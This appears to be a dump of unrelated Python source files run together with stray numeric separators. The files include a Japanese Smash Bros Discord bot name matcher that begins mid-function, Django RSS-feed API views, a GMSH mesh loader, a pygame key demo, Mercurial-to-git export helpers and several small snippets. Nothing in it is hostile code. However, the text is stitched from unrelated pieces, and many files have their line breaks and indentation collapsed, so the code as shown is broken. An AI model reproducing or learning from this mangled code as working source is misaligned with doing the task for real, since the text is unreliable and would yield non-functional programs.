ch_name == 'ファルコ': if 'ファルコン' in content: return False elif ch_name == 'クッパ': if ('ジュニア' in content) or ('Jr' in content) or ('jr' in content): return False elif ch_name == 'ピット': if ('ブラック' in content): return False elif ch_name == self.MYCHARACTER: if self._judgeMyCharacterNameContained(client, ch_name, content): return False return True def _judgeMyCharacterNameContained(self, client, ch_name, content) -> bool: all_channels = client.get_all_channels() for 
channel in all_channels: if channel.name == ch_name: continue elif (channel.name in content): return True return False def judgeFuzzyCharacterName(self, ch_name: str, content: str): """ 質問対象のキャラに対して、質問が投下されるべきチャンネルがどれなのかを メッセージのキャラ名とキャラクター毎の対策チャンネル名を見比べることで判別している。 ただ、窓民が質問メッセージを書く際に、キャラクターの名前が微妙にチャンネル名と違っちゃう場合が 出てくることが予測される。その名前の差分を力ずくで補完してくれる関数がこいつである。 TO:DO 本当はさ、もっとスッキリ書けることなんてわかってるんだよ。でもさ、メンドかったんだよ。許してくれな。 """ # ★各キャラ窓へ③ # |ch_nameがチャンネル名称からキャラ名を抽出したものです。 # |各キャラ窓のサーバーに適用させる場合、 # |1. if ch_name == 〜の行のキャラ名をチャンネル名称のキャラ名に合わせる # |2. ネス窓ではポケトレは1つのチャンネルで対応しているので、これを分ける # | (分けるに当たり、他の関数も変えるといったことは不要なはずです) # |3. ネス窓ではMiiファイター用の対策チャンネルを作成していないので、これを作る # (作るに当たり、他の関数も変えるといったことは不要なはずです) if ch_name in content: return True if ch_name == "ドクマリ": if ('ドクター' in content) or ('Dr' in content) or ('dr' in content) or ('医者' in content): return True if ch_name == "ロゼッタ&チコ": if ('ロゼチコ' in content) or ('ロゼッタ' in content): return True if ch_name == "クッパjr": if ('ジュニア' in content) or ('Jr' in content) or ('jr' in content): return True if ch_name == "パックンフラワー": if ('パックン' in content) or ('花' in content): return True if ch_name == "ドンキーコング": if ('DK' in content) or ('D.K.' in content) or ('D.K' in content) or ('ドンキー' in content) or ('ゴリラ' in content): return True if ch_name == "ディディーコング": if ('DD' in content) or ('D.D.' 
in content) or ('D.D' in content) or ('ディディー' in content) or ('猿' in content): return True if ch_name == "キングクルール": if ('クルール' in content) or ('鰐' in content) or ('ワニ' in content): return True if ch_name == "ガノンドロフ": if ('ガノン' in content) or ('おじさん' in content): return True if ch_name == "ヤングリンク": if ('ヤンリン' in content) or ('こどもリンク' in content) or ('子どもリンク' in content) or ('子供リンク' in content): return True if ch_name == "トゥーンリンク": if ('トリン' in content): return True if ch_name == "ダークサムス": if ('ダムス' in content): return True if ch_name == "ゼロスーツサムス": if ('ダムス' in content) or ('ゼロサム' in content) or ('ZSS' in content) or ('ゼロスーツ・サムス' in content): return True if ch_name == "ピチュー": if ('ピチュカス' in content): return True if ch_name == "ミュウツー": if ('M2' in content) or ('m2' in content): return True if ch_name == "ポケモントレーナー": if ('ポケモン・トレーナー' in content) or ('ポケトレ' in content) or ('ゼニガメ' in content) \ or ('フシギソウ' in content) or ('リザードン' in content) or ('リザ' in content): return True if ch_name == "ゲッコウガ": if ('蛙' in content): return True if ch_name == "メタナイト": if ('メタ' in content): return True if ch_name == "デデデ": if ('デデデ大王' in content): return True if ch_name == "フォックス": if ('狐' in content): return True if ch_name == "ブラックピット": if ('ブラック・ピット' in content) or ('ブラピ' in content): return True if ch_name == "むらびと": if ('ムラビト' in content) or ('村人' in content): return True if ch_name == "アイスクライマー": if ('アイス・クライマー' in content) or ('アイクラ' in content): return True if ch_name == "インクリング": if ('スプラゥーン' in content) or ('インリン' in content) or ('イカちゃん' in content) \ or ('いかちゃん' in content) or ('烏賊' in content) or ('イカ' in content): return True if ch_name == "キャプテン・ファルコン": if ('ファルコン' in content) or ('キャプテンファルコン' in content) or ('CF' in content) \ or ('C.F' in content) or ('cf' in content) or ('c.f' in content): return True if ch_name == "ダックハント": if ('ダック・ハント' in content) or ('犬' in content): return True if ch_name == "ピクミン&オリマー": if ('ピクミン&オリマー' in content) or ('ピクオリ' in content) or ('ピクミン' 
in content) or ('オリマー' in content): return True if ch_name == "リトル・マック": if ('リトルマック' in content) or ('マック' in content) or ('トルマク' in content): return True if ch_name == "ロボット": if ('ロボ' in content): return True if ch_name == "mrゲーム&ウォッチ": if ('ゲムヲ' in content) or ('ゲムオ' in content) or ('ミスター' in content) \ or ('ゲーム&ウォッチ' in content) or ('ゲーム&ウォッチ' in content): return True if ch_name == "wii-fitトレーナー": if ('フィットレ' in content) or ('Wii Fit' in content) or ('wii fit' in content) \ or ('Wii fit' in content) or ('wii Fit' in content) or ('Wii-Fit' in content) or ('wii-fit' in content) \ or ('Wii-fit' in content) or ('wii-Fit' in content)or ('wii-Fit' in content) \ or ('tトレーナー' in content)or ('Tトレーナー' in content) or ('t トレーナー' in content)or ('T トレーナー' in content): return True if ch_name == "パックマン": if ('金玉' in content): return True if ch_name == "ベヨネッタ": if ('ベヨ' in content): return True if ch_name == "ロックマン": if ('ロック' in content) or ('岩男' in content): return True if ch_name == "ジョーカー": if ('ペルソナ' in content): return True if ch_name == "格闘mii": if ('格闘Mii' in content) or ('格闘MII' in content): return True if ch_name == "剣術mii": if ('剣術Mii' in content) or ('剣術MII' in content): return True if ch_name == "射撃mii": if ('射撃Mii' in content) or ('射撃MII' in content) or ('シャゲミ' in content): return True if ch_name == "勇者": if ('HERO' in content) or ('hero' in content) or ('Hero' in content) \ or ('HELO' in content) or ('helo' in content) or ('Helo' in content) \ or ('ゆうしゃ' in content) or ('ユウシャ' in content) or ('ゆーしゃ' in content) \ or ('ユーシャ' in content) or ('ひーろー' in content) or ('ヒーロー' in content) \ or ('よしひこ' in content) or ('ヨシヒコ' in content): return True if ch_name == "バンジョー&カズーイ": if ('バンジョー&カズーイ' in content) or ('バンジョーとカズーイ' in content) or ('バンカズ' in content) \ or ('バンジョー' in content) or ('カズーイ' in content): return True if ch_name == "ベレスト": if ('ベレス' in content) or ('ベレト' in content): return True return False
9,593
4,074
# Copyright (c) 2017 Ansible by Red Hat
# All Rights Reserved

# Thin alias around the replacement AWX command.
from awx.main.management.commands.deprovision_instance import Command as OtherCommand

# Python
import warnings

_DEPRECATION_MESSAGE = ('This command is replaced with `deprovision_instance` and will '
                        'be removed in release 3.3.')


class Command(OtherCommand):
    """Deprecated entry point kept for backwards compatibility.

    Warns, then delegates every invocation to `deprovision_instance`.
    """

    def handle(self, *args, **options):
        # TODO: delete this entire file in 3.3
        warnings.warn(_DEPRECATION_MESSAGE)
        return super(Command, self).handle(*args, **options)
528
151
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseNotFound, HttpResponseNotAllowed from django.db import transaction import requests import ujson from url_normalize import url_normalize from api import models, query_utils, feed_handler, rss_requests, archived_feed_entry_util from api.exceptions import QueryException from api.context import Context _OBJECT_NAME = 'feed' def feed(request): permitted_methods = {'GET'} if request.method not in permitted_methods: return HttpResponseNotAllowed(permitted_methods) # pragma: no cover if request.method == 'GET': return _feed_get(request) def feeds_query(request): permitted_methods = {'POST'} if request.method not in permitted_methods: return HttpResponseNotAllowed(permitted_methods) # pragma: no cover if request.method == 'POST': return _feeds_query_post(request) def feed_subscribe(request): permitted_methods = {'POST', 'PUT', 'DELETE'} if request.method not in permitted_methods: return HttpResponseNotAllowed(permitted_methods) # pragma: no cover if request.method == 'POST': return _feed_subscribe_post(request) elif request.method == 'PUT': return _feed_subscribe_put(request) elif request.method == 'DELETE': return _feed_subscribe_delete(request) def _save_feed(url): response = None try: response = rss_requests.get(url) response.raise_for_status() except requests.exceptions.RequestException: raise QueryException('feed not found', 404) with transaction.atomic(): d = feed_handler.text_2_d(response.text) feed = feed_handler.d_feed_2_feed(d.feed, url) feed.with_subscription_data() feed.save() feed_entries = [] for d_entry in d.get('entries', []): feed_entry = None try: feed_entry = feed_handler.d_entry_2_feed_entry(d_entry) except ValueError: # pragma: no cover continue feed_entry.feed = feed feed_entries.append(feed_entry) models.FeedEntry.objects.bulk_create(feed_entries) return feed def _feed_get(request): context = Context() context.parse_request(request) context.parse_query_dict(request.GET) url = 
request.GET.get('url') if not url: return HttpResponseBadRequest('\'url\' missing') url = url_normalize(url) field_maps = None try: fields = query_utils.get_fields__query_dict(request.GET) field_maps = query_utils.get_field_maps(fields, _OBJECT_NAME) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) feed = None try: feed = models.Feed.annotate_subscription_data( models.Feed.objects.all(), request.user).get(feed_url=url) except models.Feed.DoesNotExist: try: feed = _save_feed(url) except QueryException as e: return HttpResponse(e.message, status=e.httpcode) ret_obj = query_utils.generate_return_object(field_maps, feed, context) content, content_type = query_utils.serialize_content(ret_obj) return HttpResponse(content, content_type) def _feeds_query_post(request): context = Context() context.parse_request(request) context.parse_query_dict(request.GET) if not request.body: return HttpResponseBadRequest('no HTTP body') # pragma: no cover json_ = None try: json_ = ujson.loads(request.body) except ValueError: # pragma: no cover return HttpResponseBadRequest('HTTP body cannot be parsed') if type(json_) is not dict: return HttpResponseBadRequest('JSON body must be object') # pragma: no cover count = None try: count = query_utils.get_count(json_) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) skip = None try: skip = query_utils.get_skip(json_) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) sort = None try: sort = query_utils.get_sort(json_, _OBJECT_NAME) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) search = None try: search = query_utils.get_search(context, json_, _OBJECT_NAME) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) field_maps = None try: fields = query_utils.get_fields__json(json_) field_maps = 
query_utils.get_field_maps(fields, _OBJECT_NAME) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) return_objects = None try: return_objects = query_utils.get_return_objects(json_) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) return_total_count = None try: return_total_count = query_utils.get_return_total_count(json_) except QueryException as e: # pragma: no cover return HttpResponse(e.message, status=e.httpcode) feeds = models.Feed.annotate_search_vectors(models.Feed.annotate_subscription_data( models.Feed.objects.all(), request.user)).filter(*search) ret_obj = {} if return_objects: objs = [] for feed in feeds.order_by( *sort)[skip:skip + count]: obj = query_utils.generate_return_object( field_maps, feed, context) objs.append(obj) ret_obj['objects'] = objs if return_total_count: ret_obj['totalCount'] = feeds.count() content, content_type = query_utils.serialize_content(ret_obj) return HttpResponse(content, content_type) def _feed_subscribe_post(request): user = request.user url = request.GET.get('url') if not url: return HttpResponseBadRequest('\'url\' missing') url = url_normalize(url) feed = None try: feed = models.Feed.objects.get(feed_url=url) except models.Feed.DoesNotExist: try: feed = _save_feed(url) except QueryException as e: return HttpResponse(e.message, status=e.httpcode) custom_title = request.GET.get('customtitle') existing_subscription_list = list(models.SubscribedFeedUserMapping.objects.filter( user=user).values_list('feed__feed_url', 'custom_feed_title')) existing_feed_urls = frozenset(t[0] for t in existing_subscription_list) existing_custom_titles = frozenset( t[1] for t in existing_subscription_list if t[1] is not None) if custom_title is not None and custom_title in existing_custom_titles: return HttpResponse('custom title already used', status=409) if feed.feed_url in existing_feed_urls: return HttpResponse('user already subscribed', status=409) 
read_mapping_generator = archived_feed_entry_util.read_mapping_generator_fn( feed, user) with transaction.atomic(): models.SubscribedFeedUserMapping.objects.create( user=user, feed=feed, custom_feed_title=custom_title) archived_feed_entry_util.mark_archived_entries(read_mapping_generator) return HttpResponse(status=204) def _feed_subscribe_put(request): user = request.user url = request.GET.get('url') if not url: return HttpResponseBadRequest('\'url\' missing') url = url_normalize(url) custom_title = request.GET.get('customtitle') subscribed_feed_mapping = None try: subscribed_feed_mapping = models.SubscribedFeedUserMapping.objects.get( user=user, feed__feed_url=url) except models.SubscribedFeedUserMapping.DoesNotExist: return HttpResponseNotFound('not subscribed') if custom_title is not None: if models.SubscribedFeedUserMapping.objects.exclude(uuid=subscribed_feed_mapping.uuid).filter(user=user, custom_feed_title=custom_title).exists(): return HttpResponse('custom title already used', status=409) subscribed_feed_mapping.custom_feed_title = custom_title subscribed_feed_mapping.save(update_fields=['custom_feed_title']) return HttpResponse(status=204) def _feed_subscribe_delete(request): url = request.GET.get('url') if not url: return HttpResponseBadRequest('\'url\' missing') url = url_normalize(url) count, _ = models.SubscribedFeedUserMapping.objects.filter( user=request.user, feed__feed_url=url).delete() if count < 1: return HttpResponseNotFound('user not subscribed') return HttpResponse(status=204)
8,775
2,654
#!/usr/bin/env python # encoding: utf-8 #------------------------------------------------------------------------------ # Application Name #------------------------------------------------------------------------------ app_name = "naked" #------------------------------------------------------------------------------ # Version Number #------------------------------------------------------------------------------ major_version = "0" minor_version = "1" patch_version = "31" #------------------------------------------------------------------------------ # Debug Flag (switch to False for production release code) #------------------------------------------------------------------------------ debug = False #------------------------------------------------------------------------------ # Usage String #------------------------------------------------------------------------------ usage = """ Usage: naked <primary command> [secondary command] [option(s)] [argument(s)] --- Use 'naked help' for detailed help --- """ #------------------------------------------------------------------------------ # Help String #------------------------------------------------------------------------------ help = """ --------------------------------------------------- Naked A Python command line application framework Copyright 2014 Christopher Simpkins MIT license --------------------------------------------------- ABOUT The Naked framework includes the "naked" executable and the Python toolshed library. The naked executable is a command line tool for application development, testing, profiling, and deployment. The toolshed library contains numerous useful tools for application development that can be used through standard Python module imports. These features are detailed in the documentation (link below). 
USAGE The naked executable syntax is: naked <primary command> [secondary command] [option(s)] [argument(s)] The <primary command> is mandatory and includes one of the commands in the following section. The [bracketed] syntax structure is optional and dependent upon the primary command that you use. Use the command 'naked <primary command> help' for details about a command. PRIMARY COMMANDS SECONDARY COMMANDS args help build help classify help dist all•help•sdist•swheel•wheel•win help - none - locate main•help•settings•setup make help profile help pyh help test nose•pytest•tox•unittest usage - none - version - none - HELP To learn more about a primary command, use the following syntax: naked <primary command> help DOCUMENTATION http://docs.naked-py.com SOURCE REPOSITORY https://github.com/chrissimpkins/naked ISSUE REPORTING https://github.com/chrissimpkins/naked/issues """
2,954
656
# -*- coding: utf-8 -*- """ Created on Fri Mar 27 18:54:01 2020 @author: giova """ import numpy as np import sys import meshio # Creates a mesh class class Mesh: def __init__(self): self.el_def = None self.material = None self.conn_table = None self.cds_table = None self.elements = None # globdof.shape[0] self.nodes = None # max(max(globdof[:,-1]),max(globdof[:,-2]))+1 self.nodesperelem = None self.dofspernode = None self.totdofs = None self.d = None # spatial dimensions #--------------------------------------------------------------------------- # Functions below do not belong to mesh Class #--------------------------------------------------------------------------- def el_mat(mesh,i): """ Returns the material of the current element, as defined in the material dictionary""" el_mat = mesh.material[i] return el_mat def el_type(mesh, i): """ Returns the element type of the current element""" #TODO: eliminate this function el_type = mesh.elementType[i] if el_type!=0 and el_type!=1: print('\n','Element', i, 'ERROR! Element type not recognised') sys.exit() return el_type def coordinates(mesh,i): rows = mesh.conn_table[i] cds = mesh.points[rows] return cds def NodesInElement(mesh,i): NodesInElement=mesh.conn_table[i] return NodesInElement def get_key(my_dict,val): """ Function to return key for any value. """ # This function returns the key if the first item in the array value # of a dictionary is equal to val. 
If my_dict contains # 'Fixed': array([667, 0]), get_key(my_dict,667) returns Fixed for key, value in my_dict.items(): if val == value[0]: return key print("\n value",val,"doesn't exist as \'key\': array([value, 0]) in\n", my_dict) sys.exit() def GMSH(mesh_file): sys.path.append("PRE") # create a mesh object mesh = meshio.read("D:/Documents/GitHub/metis-fem/fempagno/PRE/"+mesh_file+".msh") # check if the mesh object contains attributes needed by pyFEM # - pyFEM_MeshAttributes is a list of all the mesh attributes needed by pyFEM # - we are going to reuse the attribute points and add the other attribute from pyFEM_MeshAttributes pyFEM_MeshAttributes = ["d", "dofsNode", "elements", "elementMaterialTag", "elementType", "points"] for attribute in pyFEM_MeshAttributes: if attribute in dir(mesh): if attribute == "points": pass else: print("Error: meshio already contains the attribute",attribute) print(" ...do something!") sys.exit() # add the missing attributes from pyFEM_MeshAttributes # Note: it is assumed that the mesh is two-dimensional and that the # domain is dicretized with triangular elements and that there are # two degrees of freedom per node (i.e., this is a plain equilibrium problem) mesh.elements = 0 mesh.nodes = len(mesh.points) mesh.dofspernode = 2 mesh.totdofs=mesh.nodes*mesh.dofspernode mesh.d = 2 mesh.dofsNode = 2 mesh.conn_table = [] mesh.material = [] mesh.el_def = [] mesh.elementType = [] mesh.material = [] meshing = False quad = False try: dummy = mesh.cell_data_dict['gmsh:physical']['quad'] quad = True except KeyError: # print("No quadrilateral elements in mesh") pass triangle = False try: dummy = mesh.cell_data_dict['gmsh:physical']['triangle'] triangle = True except KeyError: # print("No triangular elements in mesh") pass if quad: meshing = True quads = len(mesh.cell_data_dict["gmsh:physical"]["quad"]) mesh.elements += quads for t in range(quads): mesh.conn_table.append(mesh.cells_dict["quad"][t]) 
materialTag=mesh.cell_data_dict["gmsh:physical"]["quad"][t] # we assume that a physical surface in 2D is only used to identify # elements with the same material property. # GMSH identifies a physical group by a tag and a name. # Tags are stores in cell_data_dict for each element. # Tags and names are linked in field_data # The function get_key returns the name (=key) for a given tag key = get_key(mesh.field_data, materialTag) mesh.material.append(key) mesh.elementType.append('quad') if triangle: meshing = True triangles = len(mesh.cell_data_dict["gmsh:physical"]["triangle"]) mesh.elements += triangles for t in range(triangles): mesh.conn_table.append(mesh.cells_dict["triangle"][t]) materialTag=mesh.cell_data_dict["gmsh:physical"]["triangle"][t] # we assume that a physical surface in 2D is only used to identify # elements with the same material property. # GMSH identifies a physical group by a tag and a name. # Tags are stores in cell_data_dict for each element. # Tags and names are linked in field_data # The function get_key returns the name (=key) for a given tag key = get_key(mesh.field_data, materialTag) mesh.material.append(key) mesh.elementType.append('triangle') if not meshing: print("something went wrong: could not extract mesh data") sys.exit() mesh.points = mesh.points[:, 0:mesh.d] #resize to the number of spatial dimensions in the problem # TODO: ...check that all the necessary attributes have been defined in a correct manner # library of the possible elements mesh.element_lib = { 'spring' : {'stiffness matrix' : {'evaluation' : 'closed form', 'domain' : None, 'rule' : None, 'points' : None}}, 'bar' : {'stiffness matrix' : {'evaluation' : 'numerical integration', 'domain' : 'line', 'rule' : 'Gauss Legendre', 'points' : 2}}, 'triangle' : {'stiffness matrix' : {'evaluation' : 'numerical integration', 'domain' : 'triangle', 'rule' : 'Gauss Legendre', 'points' : 1}}, 'quad' : {'stiffness matrix' : {'evaluation' : 'numerical integration', 'domain' : 'quad', 
'rule' : 'Gauss Legendre', 'points' : 4}} } return mesh
7,959
2,171
# Packaging script for the "FunkyFunk" distribution.
# NOTE(review): distutils is deprecated (removed in Python 3.12) — consider
# migrating to setuptools; left unchanged in this comment-only pass.
from distutils.core import setup

setup(
    author='Marco Westerhof',
    author_email='mephistolomaniac@gmail.com',
    url='https://github.com/mephizzle/python-funkyfunc',
    name='FunkyFunk',
    version='0.0.2-dev',
    packages=['funkyfunc'],
    license='Apache 2.0',
    # README is read eagerly at setup time; the file handle is left to the GC
    long_description=open('README.txt').read(),
)
326
121
from .base import LinearRegression
35
9
#!/usr/bin/env python3 # # https://stackoverflow.com/a/48034477/1832058 # import pygame pygame.init() screen = pygame.display.set_mode((300, 200)) pressed = pygame.key.get_pressed() clock = pygame.time.Clock() is_running = True while is_running: for event in pygame.event.get(): if event.type == pygame.QUIT: is_running = False elif event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: is_running = False last_pressed = pressed pressed = pygame.key.get_pressed() # --- get only keys which changed state --- changed = [idx for idx in range(len(pressed)) if pressed[idx] != last_pressed[idx]] print(changed) # or changed = [idx for idx, (a, b) in enumerate(zip(last_pressed, pressed)) if a != b] print(changed) # --- True/False for all keys --- changed = [pressed[idx] != last_pressed[idx] for idx in range(len(pressed))] print(changed) # or changed = [a != b for a, b in zip(last_pressed, pressed)] print(changed) # --- clock.tick(25) pygame.quit()
1,116
385
""" sqlalchemy patcher module """ from __future__ import absolute_import from epsagon.modules.general_wrapper import wrapper from ..events.sqlalchemy import SqlAlchemyEventFactory from ..utils import patch_once def _wrapper(wrapped, instance, args, kwargs): """ General wrapper for sqlalchemy instrumentation. :param wrapped: wrapt's wrapped :param instance: wrapt's instance :param args: wrapt's args :param kwargs: wrapt's kwargs :return: None """ return wrapper(SqlAlchemyEventFactory, wrapped, instance, args, kwargs) def patch(): """ patch module. :return: None """ patch_once( 'sqlalchemy.orm.session', 'Session.__init__', _wrapper ) patch_once( 'sqlalchemy.orm.session', 'Session.close', _wrapper )
828
260
def make_profile():
    """Build a Firefox profile that proxies HTTP and SSL traffic through
    a host named "pywb" on port 8080, and return the profile's path."""
    from selenium import webdriver

    proxy_settings = {
        "network.proxy.http": "pywb",
        "network.proxy.http_port": 8080,
        "network.proxy.share_proxy_settings": True,
        "network.proxy.ssl": "pywb",
        "network.proxy.ssl_port": 8080,
        # type 1 = manual proxy configuration
        "network.proxy.type": 1,
    }

    profile = webdriver.FirefoxProfile()
    for preference, value in proxy_settings.items():
        profile.set_preference(preference, value)
    profile.update_preferences()
    return profile.path
471
176
from typing import Optional

from app import model, client
from app.component.connect import resolver


class SinkResolver(resolver.BaseConnectResolver):
    """Connect resolver specialised for sink connectors.

    All resolution behaviour comes from BaseConnectResolver; this subclass
    only pins the connector type to sinks and opts out of schema lookup.
    """

    def __init__(self, *, connect_client: client.ConnectClient):
        # Fix the connector type so the base resolver only sees sinks.
        super().__init__(connect_client=connect_client, connector_type=model.RESOURCE_SINK)

    def _get_schema(self, target: model.SpecItem) -> Optional[model.SchemaParams]:
        # Sinks expose no schema parameters here — always None.
        return None
415
118
""" Scrapy-Cookies signals These signals are documented in docs/topics/signals.rst. Please don't add new signals here without documenting them there. """ cookies_invalidated = object()
187
59
#!/usr/bin/python # -*- coding: utf-8 -*- from rons_tutorial_formatting import * print_block_separator() x = 1 while x < 10: print x, x += 1 end_block(True) start_block() words = ['hello', 'world', 'have', 'a', 'nice', 'day'] for word in words: if word.isalpha() and word[0] == 'h': print word, elif len(word) == 1: print word.upper(), else: shortened_word = word[:-1] print shortened_word.title(), end_block(True) start_block() for value_in_range in range(12, 98, 3): print value_in_range, ',', end_block(True) start_block() the_range = range(1, 10) for j in the_range: if j > 9: print j break else: print "The range `%s` does not contain anything greater than 9" % the_range print for j in range(0, 1000, 10): if j < 500: continue print j, ',', end_block(True)
881
347
# Some imports from matplotlib import pyplot as plt import cv2 # for display from skimage import data # for loading example data from skimage.color import rgb2gray # for converting to grayscale # Load image, convert to grayscale and show it image = rgb2gray(data.astronaut()) def draw_image_histogram(image, channels, color='k'): hist = cv2.calcHist([image], channels, None, [256], [0, 256]) plt.plot(hist, color=color) plt.xlim([0, 256])
471
168
class Stack:
    """A LIFO stack backed by a plain list; the top of the stack is the
    end of the list, so push/pop are amortised O(1)."""

    def __init__(self):
        self.items = []

    def is_empty(self):
        """True when nothing is stored (an empty list is falsy)."""
        return not self.items

    def push(self, item):
        """Place *item* on top of the stack."""
        self.items.append(item)

    def pop(self):
        """Remove and return the top item (IndexError when empty)."""
        return self.items.pop()

    def peek(self):
        """Return the top item without removing it (IndexError when empty)."""
        return self.items[-1]

    def size(self):
        """Number of items currently stored."""
        return len(self.items)

    def __str__(self):
        return str(self.items)


if __name__ == "__main__":
    # Demo: reverse a string by pushing every character, then popping them
    # back off in LIFO order.
    text = ".koob doog a htiw nohtyP nraeL"
    stack = Stack()
    for ch in text:
        stack.push(ch)
    pieces = []
    while not stack.is_empty():
        pieces.append(stack.pop())
    print("".join(pieces))
677
238
#!/usr/bin/env python2
# pylint: disable=E1101,E0602
# Copyright (c) 2007, 2008 Rocco Rutte <pdmef@gmx.net> and others.
# License: MIT <http://www.opensource.org/licenses/mit-license.php>
#
# Helpers for exporting a Mercurial repository to git: user/branch fixup,
# changeset extraction, mark-file caches, and git ref lookup. All repository
# data is handled as bytes; only cache filenames/refs cross into str.

import os
import re
import subprocess
import sys

from mercurial import error as hgerror
from mercurial import hg, templatefilters, ui
from mercurial.scmutil import binnode, revsymbol

PY2 = sys.version_info.major < 3
if PY2:
    # On Python 2 make str behave like text and provide fsencode.
    str = unicode  # noqa: F821
    fsencode = lambda s: s.encode(sys.getfilesystemencoding())  # noqa: E731
else:
    from os import fsencode

# default git branch name
cfg_master = b"master"
# default origin name
origin_name = b""
# silly regex to see if user field has email address
user_re = re.compile(b"([^<]+) (<[^>]*>)$")
# silly regex to clean out user names
user_clean_re = re.compile(b'^["]([^"]+)["]$')


def set_default_branch(name):
    """Override the module-wide default branch name (accepts str or bytes)."""
    global cfg_master
    cfg_master = name.encode("utf8") if not isinstance(name, bytes) else name


def set_origin_name(name):
    """Set the origin prefix prepended to every emitted branch name."""
    global origin_name
    origin_name = name


def setup_repo(url):
    """Open the Mercurial repository at *url*; returns (ui, unfiltered repo)."""
    try:
        myui = ui.ui(interactive=False)
    except TypeError:
        # Older Mercurial: no constructor kwarg, configure afterwards.
        myui = ui.ui()
        myui.setconfig(b"ui", b"interactive", b"off")
    # Avoids a warning when the repository has obsolete markers
    myui.setconfig(b"experimental", b"evolution.createmarkers", True)
    return myui, hg.repository(myui, fsencode(url)).unfiltered()


def fixup_user(user, authors):
    """Normalise an hg user field to git's b"Name <mail>" form,
    applying the optional authors mapping first."""
    user = user.strip(b'"')
    if authors is not None:
        # if we have an authors table, try to get mapping
        # by defaulting to the current value of 'user'
        user = authors.get(user, user)
    name, mail, m = b"", b"", user_re.match(user)
    if m is None:
        # if we don't have 'Name <mail>' syntax, extract name
        # and mail from hg helpers. this seems to work pretty well.
        # if email doesn't contain @, replace it with devnull@localhost
        name = templatefilters.person(user)
        mail = b"<%s>" % templatefilters.email(user)
        if b"@" not in mail:
            mail = b"<devnull@localhost>"
    else:
        # if we have 'Name <mail>' syntax, everything is fine :)
        name, mail = m.group(1), m.group(2)
    # remove any silly quoting from username
    m2 = user_clean_re.match(name)
    if m2 is not None:
        name = m2.group(1)
    return b"%s %s" % (name, mail)


def get_branch(name):
    """Map an hg branch name to the git branch name, applying the default
    branch substitution and the optional origin prefix."""
    # 'HEAD' is the result of a bug in mutt's cvs->hg conversion,
    # other CVS imports may need it, too
    if name == b"HEAD" or name == b"default" or name == b"":
        name = cfg_master
    if origin_name:
        return origin_name + b"/" + name
    return name


def get_changeset(ui, repo, revision, authors={}, encoding=""):
    """Read one changeset; returns (node, manifest, user, (time, tz), files,
    desc, branch, extra) with user/branch already git-normalised.

    NOTE(review): the ``ui`` parameter shadows the imported mercurial.ui
    module and the mutable default ``authors={}`` is never mutated here,
    but both are kept for API compatibility.
    """
    # Starting with Mercurial 4.6 lookup no longer accepts raw hashes
    # for lookups. Work around it by changing our behaviour depending on
    # how it fails
    try:
        node = repo.lookup(revision)
    except (TypeError, hgerror.ProgrammingError):
        node = binnode(revsymbol(repo, b"%d" % revision))  # We were given a numeric rev
    except hgerror.RepoLookupError:
        node = revision  # We got a raw hash
    (manifest, user, (time, timezone), files, desc, extra) = repo.changelog.read(node)
    if encoding:
        user = user.decode(encoding).encode("utf8")
        desc = desc.decode(encoding).encode("utf8")
    # hg stores the offset in seconds west of UTC; git wants ±HHMM.
    tz = b"%+03d%02d" % (-timezone // 3600, ((-timezone % 3600) // 60))
    branch = get_branch(extra.get(b"branch", b"master"))
    return (
        node,
        manifest,
        fixup_user(user, authors),
        (time, tz),
        files,
        desc,
        branch,
        extra,
    )


def mangle_key(key):
    """Identity key transform; callers of load_cache may substitute their own."""
    return key


def load_cache(filename, get_key=mangle_key):
    """Load a ":key value" cache file into a dict (bytes -> bytes).

    Malformed lines are reported on stderr and skipped.
    """
    cache = {}
    if not os.path.exists(filename):
        return cache
    f = open(filename, "rb")
    linecount = 0
    for line in f.readlines():
        linecount += 1
        fields = line.split(b" ")
        if fields is None or not len(fields) == 2 or fields[0][0:1] != b":":
            sys.stderr.write(
                "Invalid file format in [%s], line %d\n" % (filename, linecount)
            )
            continue
        # put key:value in cache, key without ^:
        cache[get_key(fields[0][1:])] = fields[1].split(b"\n")[0]
    f.close()
    return cache


def save_cache(filename, cache):
    """Write *cache* to *filename* in the ":key value" format read by
    load_cache, coercing non-bytes keys/values to utf8 bytes."""
    f = open(filename, "wb")
    for key, value in cache.items():
        if not isinstance(key, bytes):
            key = str(key).encode("utf8")
        if not isinstance(value, bytes):
            value = str(value).encode("utf8")
        f.write(b":%s %s\n" % (key, value))
    f.close()


def get_git_sha1(name, type="heads"):
    """Return the 40-char sha1 of git ref refs/<type>/<name>, or None when
    the ref does not exist."""
    try:
        # use git-rev-parse to support packed refs
        ref = "refs/%s/%s" % (type, name.decode("utf8"))
        line = subprocess.check_output(
            ["git", "rev-parse", "--verify", "--quiet", ref.encode("utf8")]
        )
        if line is None or len(line) == 0:
            return None
        return line[0:40]
    except subprocess.CalledProcessError:
        return None
5,100
1,722
""" 最终的结果要考虑 Python 的int 类型会比一般语言的长,所以要考虑 32位这个范围。 """ class Solution: def reverse(self, x: int) -> int: y = x if x < 0: y = -1 * x y = str(y)[::-1] if x < 0: r = -1 * int(y) else: r = int(y) return r if -2147483648 < r < 2147483647 else 0
331
179
"""Define padrões de URL para users""" from django.urls import path, include from django.contrib.auth.views import LoginView from . import views urlpatterns = [ # Página de Login path('login', LoginView.as_view(template_name='users/login.html'), name='login'), path('logout', views.logout_view, name='logout'), path('register', views.register, name='register') ]
382
118
import logging

from django.contrib.auth import get_user_model, authenticate
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import Http404
from django.views.generic import RedirectView
from rest_framework import status, permissions
from rest_framework.exceptions import ValidationError
from rest_framework.generics import get_object_or_404
from rest_framework.response import Response
from rest_framework.reverse import reverse
from rest_framework.views import APIView
from rest_framework.viewsets import ModelViewSet

from resumecollection.users.helpers import UpdatePasswordHelper
from resumecollection.users.v1.serializers import (
    UserSerializer,
    ForgotPasswordEmailSerializer,
    UpdatePasswordRequestSerializer,
    LoginRequestSerializer,
)
from resumecollection.utils.authentication import create_login_token
from resumecollection.utils.email import send_password_update_email
